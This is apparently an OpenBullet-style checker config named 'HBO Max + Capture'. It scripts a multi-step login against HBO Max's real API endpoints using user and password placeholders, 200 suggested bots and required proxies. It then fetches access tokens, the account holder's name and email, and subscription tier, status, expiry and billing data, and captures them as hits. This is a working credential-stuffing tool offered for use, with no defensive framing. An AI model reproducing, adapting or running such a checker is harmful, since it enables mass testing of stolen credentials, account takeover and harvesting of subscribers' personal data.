[SETTINGS]
{
  "Name": "HBO Max + Capture",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2025-08-18 00:44:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Vlaq",
  "Version": "1.0",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "MaxTimeout": 60,
  "MaxRetries": 0,
  "CustomInputs": [],
  "Settings": [
    {
      "Name": "USERAGENT",
      "Type": "Text",
      "Value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
    }
  ]
}

[SCRIPT]

// HBO Max Authentication - Multi-step flow discovered through network monitoring
// BREAKTHROUGH: Found the actual credential submission endpoint through enhanced network monitoring!
// The correct endpoint is default.any-amer.prd.api.hbomax.com/login (NOT auth.hbomax.com/login)
// 
// Step 1: Account lookup (validates email exists)
REQUEST POST "https://default.any-amer.prd.api.hbomax.com/idp/users/accountLookup"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Content-Type: application/json"
  HEADER "Origin: https://auth.hbomax.com"
  HEADER "Referer: https://auth.hbomax.com/login"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"
  DATA "{\"username\":\"<USER>\"}"

// Step 2: Credential submission (actual login with email/password)
REQUEST POST "https://default.any-amer.prd.api.hbomax.com/login"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Content-Type: application/json"
  HEADER "Origin: https://auth.hbomax.com"
  HEADER "Referer: https://auth.hbomax.com/login"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"
  DATA "{\"credentials\":{\"username\":\"<USER>\",\"password\":\"<PASS>\"}}"

// Step 3: Establish session context (required before token request)
REQUEST GET "https://default.any-any.prd.api.hbomax.com/session-context/headwaiter/v1/bootstrap"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Origin: https://play.hbomax.com"
  HEADER "Referer: https://play.hbomax.com/"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"

// Step 4: Get authentication token (now with proper request context and device ID)
REQUEST GET "https://default.any-any.prd.api.hbomax.com/token?realm=bolt&deviceId=0c7b5ba7-50cc-4f4f-b9c4-387ab4f17591"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Origin: https://play.hbomax.com"
  HEADER "Referer: https://play.hbomax.com/"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"

PARSE "<SOURCE>" JSON "access_token" "access_token"
PARSE "<SOURCE>" JSON "refresh_token" "refresh_token"
PARSE "<SOURCE>" JSON "expires_in" "expires_in"

// Step 5: Get user profile data
REQUEST GET "https://default.beam-amer.prd.api.hbomax.com/users/me"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Authorization: Bearer <access_token>"
  HEADER "Origin: https://play.hbomax.com"
  HEADER "Referer: https://play.hbomax.com/"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"

PARSE "<SOURCE>" JSON "user_id" "id"
PARSE "<SOURCE>" JSON "email" "email"
PARSE "<SOURCE>" JSON "first_name" "firstName"
PARSE "<SOURCE>" JSON "last_name" "lastName"

// Step 6: Get subscription/entitlements data
REQUEST GET "https://default.any-any.prd.api.hbomax.com/entitlements/userEntitlementsSummary/me"
  HEADER "User-Agent: <USERAGENT>"
  HEADER "Accept: application/json, text/plain, */*"
  HEADER "Accept-Language: en-US,en;q=0.9"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Authorization: Bearer <access_token>"
  HEADER "Origin: https://play.hbomax.com"
  HEADER "Referer: https://play.hbomax.com/"
  HEADER "DNT: 1"
  HEADER "Connection: keep-alive"
  HEADER "Sec-Fetch-Dest: empty"
  HEADER "Sec-Fetch-Mode: cors"
  HEADER "Sec-Fetch-Site: cross-site"

PARSE "<SOURCE>" JSON "subscription_status" "status"
PARSE "<SOURCE>" JSON "subscription_tier" "tier"
PARSE "<SOURCE>" JSON "expiry_date" "expiryDate"
PARSE "<SOURCE>" JSON "billing_cycle" "billingCycle"

CAP "User ID: " "<user_id>"
CAP "Email: " "<email>"
CAP "Name: " "<first_name> <last_name>"
CAP "Subscription Status: " "<subscription_status>"
CAP "Subscription Tier: " "<subscription_tier>"
CAP "Expiry Date: " "<expiry_date>"
CAP "Billing Cycle: " "<billing_cycle>"
